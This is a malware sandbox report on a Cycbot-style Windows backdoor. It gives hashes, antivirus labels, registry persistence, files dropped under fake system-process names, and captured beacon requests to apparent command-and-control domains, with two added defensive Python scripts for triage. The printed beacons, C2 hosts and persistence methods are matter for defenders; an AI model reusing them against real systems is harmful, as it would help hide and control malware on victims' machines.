Analysis Date: 2014-11-19 12:17:20
MD5: e03e3dae0bf4985d89b4d3ecbf13a64a
SHA1: 1d3054e4725d7d418be9d9063f5b18e70c7707ff

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 105b2895ce39d1cf9b29ff433a88bd53  sha1: 4e028abcb58fda86a03057e8cf0cdacdb6741d48  size: 123904
Section .rdata  md5: a40badba55354ed7974106d193320679  sha1: cf5b98653678f05717098b9751be6025b879329e  size: 1024
Section .data   md5: 8bb7e4334c7085e71bd7dd13b3fd9e5d  sha1: b4e0a72dd14204b35795fa2f36d700136ce7ba03  size: 72704
Section .reloc  md5: c17ee98e71ca131cd2f7807db227bcae  sha1: 2423a4eaff225e0d6cbec22fdf63e6072358f8b2  size: 1024
Timestamp: 2005-09-04 19:25:25 (PE header compile time; this field is attacker-controlled and here sits nine years before the analysis date, so do not use it for dating the sample)
PEhash: b4b7ebec857f90d93a90e5d45ffc41632c311fd7
IMPhash: 4f64d14cfcf21e4d661b7aae5a716816
AV 360 Safe: Gen:Heur.Conjar.5
AV Ad-Aware: Gen:Heur.Conjar.5
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV BullGuard: Gen:Heur.Conjar.5
AV CA (E-Trust Ino): Win32/Cycbot.G!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-449
AV Dr. Web: BackDoor.Gbot.73 - infected, incurable
AV Emsisoft: Gen:Heur.Conjar.5
AV Eset (nod32): Win32/Kryptik.SXV
AV Fortinet: W32/Kryptik.SMY!tr.bdr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV F-Secure: Rogue:W32/OpenCloud.A
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.n
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.5
AV Rising: Backdoor.Win32.Cycbot.a
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen7
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: folusho.com
Winsock DNS: 127.0.0.1
Winsock DNS: yourblogresources.com
Winsock DNS: coolmediastore.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
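The runtime events above show two host-side patterns worth turning into checks. First, an autostart value is written to HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load (the registry successor of the old win.ini `load=` line, which many autorun tools do not enumerate) pointing at a csrss.exe in the user's Temp directory. Second, the sample re-launches itself with a `start<path>%<dir>` argument and drops copies named dwm.exe and conhost.exe under Application Data; the real processes by those names live in System32 only, and on the Windows XP guest used here (Documents and Settings paths) dwm.exe and conhost.exe do not exist at all. The script below is an added example, not part of this report or the sandbox's own code. The event list is constructed from the entries above plus one benign control row; the system-process name list, the autostart value list and the `triage` finding format are the author's assumptions.

```python
"""Host-event triage for the Runtime Details above.

Added example, not part of the sandbox report. EVENTS is constructed from the
report (last row is a benign control); the rule lists are assumptions.
"""

# Windows system process names that legitimately run only from the system
# directories. Assumption: list chosen for this example.
SYSTEM_PROCESS_NAMES = {
    "csrss.exe", "dwm.exe", "conhost.exe", "svchost.exe", "lsass.exe",
    "winlogon.exe", "smss.exe", "services.exe",
}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Hive-relative registry values (lower-case) that start a program at logon.
AUTOSTART_VALUES = {
    r"software\microsoft\windows nt\currentversion\windows\load",
    r"software\microsoft\windows nt\currentversion\windows\run",
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\runonce",
}
PROXY_ENABLE = r"software\microsoft\windows\currentversion\internet settings\proxyenable"

# (kind, target, data) tuples constructed from the report's Runtime Details.
EVENTS = [
    ("registry", r"HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable", "1"),
    ("registry", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load",
     r"C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe"),
    ("file", r"C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe", None),
    ("file", r"C:\Documents and Settings\Administrator\Application Data\75DE.FFC", None),
    ("process", r"C:\Documents and Settings\Administrator\Application Data\dwm.exe", None),
    ("process", r"C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe", None),
    ("process", r"C:\WINDOWS\system32\csrss.exe", None),  # benign control row
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_masquerading(path):
    """System-process file name, but the file sits outside the system dirs."""
    p = path.lower()
    return _basename(p) in SYSTEM_PROCESS_NAMES and not p.startswith(SYSTEM_DIRS)


def classify_registry(key, data):
    """Return a finding string for an autostart or proxy write, else None."""
    hive, _, subkey = key.partition("\\")
    sk = subkey.lower()
    if sk in AUTOSTART_VALUES:
        return f"autostart: {hive}\\{subkey} -> {data}"
    if sk == PROXY_ENABLE and data == "1":
        return f"proxy enabled: {hive}\\{subkey} = {data}"
    return None


def triage(events):
    """Walk (kind, target, data) events and collect findings in order."""
    findings = []
    for kind, target, data in events:
        if kind == "registry":
            finding = classify_registry(target, data)
            if finding:
                findings.append(finding)
                # An autostart that points at a masquerading binary is the
                # strongest signal in this report.
                if finding.startswith("autostart") and is_masquerading(data):
                    findings.append(f"masquerade (autostart target): {data}")
        elif kind in ("file", "process") and is_masquerading(target):
            findings.append(f"masquerade ({kind}): {target}")
    return findings


if __name__ == "__main__":
    for line in triage(EVENTS):
        print(line)
```

The proxy rule is deliberately narrow: ProxyEnable=1 on its own is common on corporate hosts, so it is reported as context next to the autostart finding rather than as an alert by itself.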

Network Details:

DNS: folusho.com (A) ➝ 67.222.55.143
DNS: zonedg.com (A) ➝ 141.8.225.80
DNS: zonedg.com (A) ➝ 141.8.225.80
DNS: yourblogresources.com (A) ➝ no address recorded
DNS: coolmediastore.com (A) ➝ no address recorded
HTTP GET: http://folusho.com/wp-content/uploads/2010/09/web-20-what-is-300x251.jpg?v35=46&tq=gHZutDyMv5rJejTia9nrmsl6giWz%2BJZbVyA%3D
  User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
  User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
  User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 67.222.55.143:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   75706c6f 6164732f 32303130 2f30392f   uploads/2010/09/
0x00000020 (00032)   7765622d 32302d77 6861742d 69732d33   web-20-what-is-3
0x00000030 (00048)   30307832 35312e6a 70673f76 33353d34   00x251.jpg?v35=4
0x00000040 (00064)   36267471 3d67485a 75744479 4d763572   6&tq=gHZutDyMv5r
0x00000050 (00080)   4a656a54 6961396e 726d736c 36676957   JejTia9nrmsl6giW
0x00000060 (00096)   7a253242 4a5a6256 79412533 44204854   z%2BJZbVyA%3D HT
0x00000070 (00112)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000080 (00128)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000090 (00144)   20666f6c 7573686f 2e636f6d 0d0a4163    folusho.com..Ac
0x000000a0 (00160)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000000b0 (00176)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x000000c0 (00192)   2e300d0a 0d0a                         .0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 70537225 32466525 32425635   2BsqpSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53253246   ij%2B8yjYvEaS%2F
0x000000c0 (00192)   54253242 73717453 72253246 65253242   T%2BsqtSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7563 68206669    close....uch fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.
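The three requests in the capture share one fingerprint: a lower-case User-Agent of mozilla/2.0 that no real browser sends, a tq= query parameter carrying URL-encoded base64, and, for the POSTs, a Content-Length of 0 because the payload rides in the query string instead of the body. The image URL on folusho.com is cover traffic in form only; the tq= blob is still attached. Note also that the tail of the last capture is the server's answer: an HTML page ending in "file or directory." with a Microsoft-IIS/7.0 footer, i.e. an error page rather than a successful check-in, so what the capture documents is the beacon format, not a working C2 session. The script below is an added example, not part of this report or the sandbox. The request texts are reconstructed inline from the Raw Pcap section, with one constructed benign request as a control; the scoring rules and the `min_hits` threshold are the author's assumptions rather than a published signature, and `decode_tq` only strips the transport encoding, since the report does not reveal the plaintext format of the blob.

```python
"""Beacon scoring over the HTTP requests in the Raw Pcap section.

Added example, not part of the sandbox report. REQUESTS is reconstructed from
the capture plus one constructed benign request; scoring rules are assumptions.
"""
import base64
from urllib.parse import parse_qs, unquote, urlparse

REQUESTS = [
    # First capture: GET to folusho.com
    "GET /wp-content/uploads/2010/09/web-20-what-is-300x251.jpg?v35=46&tq=gHZutDyMv5rJejTia9nrmsl6giWz%2BJZbVyA%3D HTTP/1.0\r\n"
    "Connection: close\r\nHost: folusho.com\r\nAccept: */*\r\nUser-Agent: mozilla/2.0\r\n\r\n",
    # Second capture: POST to zonedg.com
    "POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1\r\n"
    "Host: zonedg.com\r\nUser-Agent: mozilla/2.0\r\nContent-Length: 0\r\nConnection: close\r\n\r\n",
    # Constructed benign control request (not from the capture).
    "GET /index.html HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1)\r\nAccept: */*\r\n\r\n",
]


def parse_request(raw):
    """Split an HTTP/1.x request head into method, path, query and headers."""
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlparse(target)
    return {"method": method, "path": url.path, "query": parse_qs(url.query),
            "version": version, "headers": headers}


def decode_tq(value):
    """URL-decode, then base64-decode the tq parameter.

    Returns the raw bytes; the report gives no plaintext format, so nothing
    further is assumed about them. Raises ValueError on non-base64 input.
    """
    return base64.b64decode(unquote(value), validate=True)


def score(req):
    """Return the list of reasons a request looks like this beacon format."""
    reasons = []
    if req["headers"].get("user-agent", "") == "mozilla/2.0":
        reasons.append("user-agent mozilla/2.0")
    tq = req["query"].get("tq", [None])[0]
    if tq:
        try:
            blob = decode_tq(tq)
            reasons.append(f"tq= carries {len(blob)} bytes of base64-encoded binary")
        except ValueError:
            pass
    if req["method"] == "POST" and req["headers"].get("content-length") == "0":
        reasons.append("POST with empty body (data is in the query string)")
    return reasons


def find_beacons(requests, min_hits=2):
    """Return (host, path, reasons) for requests matching at least min_hits rules."""
    out = []
    for raw in requests:
        req = parse_request(raw)
        reasons = score(req)
        if len(reasons) >= min_hits:
            out.append((req["headers"].get("host"), req["path"], reasons))
    return out


if __name__ == "__main__":
    for host, path, reasons in find_beacons(REQUESTS):
        print(host, path, "; ".join(reasons))
```

Requiring two rules keeps a lone odd User-Agent from firing on its own; the GET still qualifies because the tq= blob is present, which is the point of scoring the query parameter separately from the POST shape.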


Strings
!This program cannot be run in DOS mode.
.rdata
.data
.reloc
VS_VERSION_INFO
StringFileInfo
VarFileInfo
Translation
080904b0
FileVersion
ProductVersion
PrivateBuild
1.0.0.1
1418
&find
&Find any        Alt+F
KERNEL32.dll
USER32
SHELL32.dll
RPCRT4.dll
WINMM.dll
ClipCursor
CreatePopupMenu
DestroyMenu
DuplicateHandle
EnumResourceNamesW
FindClose
FindFirstFileA
FindResourceExA
FindWindowA
FlushInstructionCache
GetDesktopWindow
GetModuleFileNameW
MapViewOfFile
NdrComplexArrayFree
RedrawWindow
SetFileShortNameW
Shell_NotifyIconA
timeEndPeriod
TrackPopupMenuEx
UnmapViewOfFile
UuidCreate
Remaining strings in the dump: runs of repeated characters and short random byte fragments from the packed sections, with no readable identifiers.